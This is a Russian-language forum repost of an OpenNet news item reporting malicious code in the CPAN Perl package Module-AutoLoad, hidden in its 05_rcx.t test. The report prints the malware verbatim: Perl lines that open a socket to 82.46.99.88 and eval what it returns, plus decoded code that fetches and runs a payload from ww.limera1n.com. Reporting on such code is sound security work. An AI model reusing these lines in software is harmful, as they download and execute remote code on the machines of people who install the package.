В Perl-пакете Module-AutoLoad выявлен вредоносный код
Автор
Сообщение
news_bot ®
Стаж: 6 лет 9 месяцев
Сообщений: 27286
В распространяемом через каталог CPAN Perl-пакете Module-AutoLoad, предназначенном для автоматической загрузки CPAN-модулей на лету, выявлен вредоносный код. Вредоносная вставка была найдена в коде теста 05_rcx.t, который поставляется с 2011 года.
Примечательно, что вопросы о загрузке сомнительного кода возникали на Stackoverflow ещё в 2016 году.
Вредоносная активность сводится к попытке загрузки и выполнения кода со стороннего сервера (http://r.cx:1/) в процессе выполнения тестового набора, запускаемого при установке модуля. Предполагается, что изначально загружаемый с внешнего сервера код не был вредоносным, но теперь запрос перенаправляется на домен ww.limera1n.com, отдающий свою порцию кода для выполнения.
Для организации загрузки в файле 05_rcx.t используется следующий код:
my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;
Указанный код приводит к выполнению скрипта ../contrib/RCX.pl, содержимое которого сводится к строке:
use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};
Данный скрипт загружает запутанный при помощи сервиса perlobfuscator.com код с внешнего хоста r.cx (82.46.99.88 = "R.cX") и выполняет его в блоке eval.
$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1"; print <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE....}
После распаковки в итоге выполняется следующий код:
print{$b=new IO::Socket::INET"ww.limera1n.com:80"}"GET /iJailBreak
";evalor return warn$@while$b;1
В настоящее время проблемный пакет удалён из хранилища PAUSE (Perl Authors Upload Server), а учётная запись автора модуля заблокирована. При этом модуль пока остаётся доступен в архиве MetaCPAN и может быть напрямую установлен с MetaCPAN при помощи некоторых утилит, таких как cpanminus. Отмечается, что пакет не был широко распространён.
Интересно, что к обсуждению подключился и автор модуля, который опроверг информацию о том, что вредоносный код подставлен после взлома его сайта "r.cx" и пояснил, что он просто так развлекался, а perlobfuscator.com использовал не для скрытия чего-то, а для сокращения размера кода и упрощения его копирования через буфер обмена. Выбор названия функции "botstrap" пояснён тем, что это слово "звучит как bot и короче, чем bootstrap". Автор модуля также заверил, что выявленные манипуляции не совершают вредоносных действий, а лишь демонстрируют загрузку и выполнение кода по TCP.
===========
Источник:
OpenNet.RU
===========
Похожие новости
- Главная ссылка к новости (https://news.perlfoundation.or...)
- OpenNews: В RubyGems выявлено 724 вредоносных пакета
- OpenNews: В каталоге Python-пакетов PyPI выявлены две вредоносные библиотеки
- OpenNews: В репозитории NPM выявлен вредоносный пакет bb-builder. Выпуск NPM 6.11
- OpenNews: В зависимостях к npm-пакету с установщиком PureScript выявлены вредоносные изменения
- OpenNews: В каталоге PyPI выявлены вредоносные пакеты
Похожие новости:
- [IT-компании] Яндекс принудительно устанавливает неудаляемый «Яндекс.Телемост» в другие свои программы на компьютере пользователя
- [Машинное обучение] Как быстро и просто ускорить доступ к API приложениям?
- [Node.JS, PHP, Perl, Python, Информационная безопасность] Трюки с переменными среды (перевод)
- Анализ рисков при воплощении в жизнь инициативы Perl 7
- [Антивирусная защита, Информационная безопасность, Реверс-инжиниринг] RATKing: новая кампания с троянами удаленного доступа
- [Perl, История IT, Программирование] Разработчики анонсировали Perl 7
- Анонсирован Perl 7
- Релиз языка программирования Perl 5.32.0
- [Работа с 3D-графикой, Разработка игр, Unity, Дизайн игр] Реализация тумана войны из Civilization VI в Unity (перевод)
- [Децентрализованные сети, Go, Распределённые системы] Fabex — block explorer для Hyperledger Fabric
Теги для поиска: #_perl, #_cpan, #_malware
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 25-Ноя 23:19
Часовой пояс: UTC + 5
| Автор | Сообщение |
|---|---|
|
news_bot ®
Стаж: 6 лет 9 месяцев |
|
|
В распространяемом через каталог CPAN Perl-пакете Module-AutoLoad, предназначенном для автоматической загрузки CPAN-модулей на лету, выявлен вредоносный код. Вредоносная вставка была найдена в коде теста 05_rcx.t, который поставляется с 2011 года. Примечательно, что вопросы о загрузке сомнительного кода возникали на Stackoverflow ещё в 2016 году. Вредоносная активность сводится к попытке загрузки и выполнения кода со стороннего сервера (http://r.cx:1/) в процессе выполнения тестового набора, запускаемого при установке модуля. Предполагается, что изначально загружаемый с внешнего сервера код не был вредоносным, но теперь запрос перенаправляется на домен ww.limera1n.com, отдающий свою порцию кода для выполнения. Для организации загрузки в файле 05_rcx.t используется следующий код: my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x; my $try = `$^X $prog`; use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};
$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1"; print <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE....} print{$b=new IO::Socket::INET"ww.limera1n.com:80"}"GET /iJailBreak
";evalor return warn$@while$b;1 Интересно, что к обсуждению подключился и автор модуля, который опроверг информацию о том, что вредоносный код подставлен после взлома его сайта "r.cx" и пояснил, что он просто так развлекался, а perlobfuscator.com использовал не для скрытия чего-то, а для сокращения размера кода и упрощения его копирования через буфер обмена. Выбор названия функции "botstrap" пояснён тем, что это слово "звучит как bot и короче, чем bootstrap". Автор модуля также заверил, что выявленные манипуляции не совершают вредоносных действий, а лишь демонстрируют загрузку и выполнение кода по TCP. =========== Источник: OpenNet.RU =========== Похожие новости
|
|
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы не можете скачивать файлы
Текущее время: 25-Ноя 23:19
Часовой пояс: UTC + 5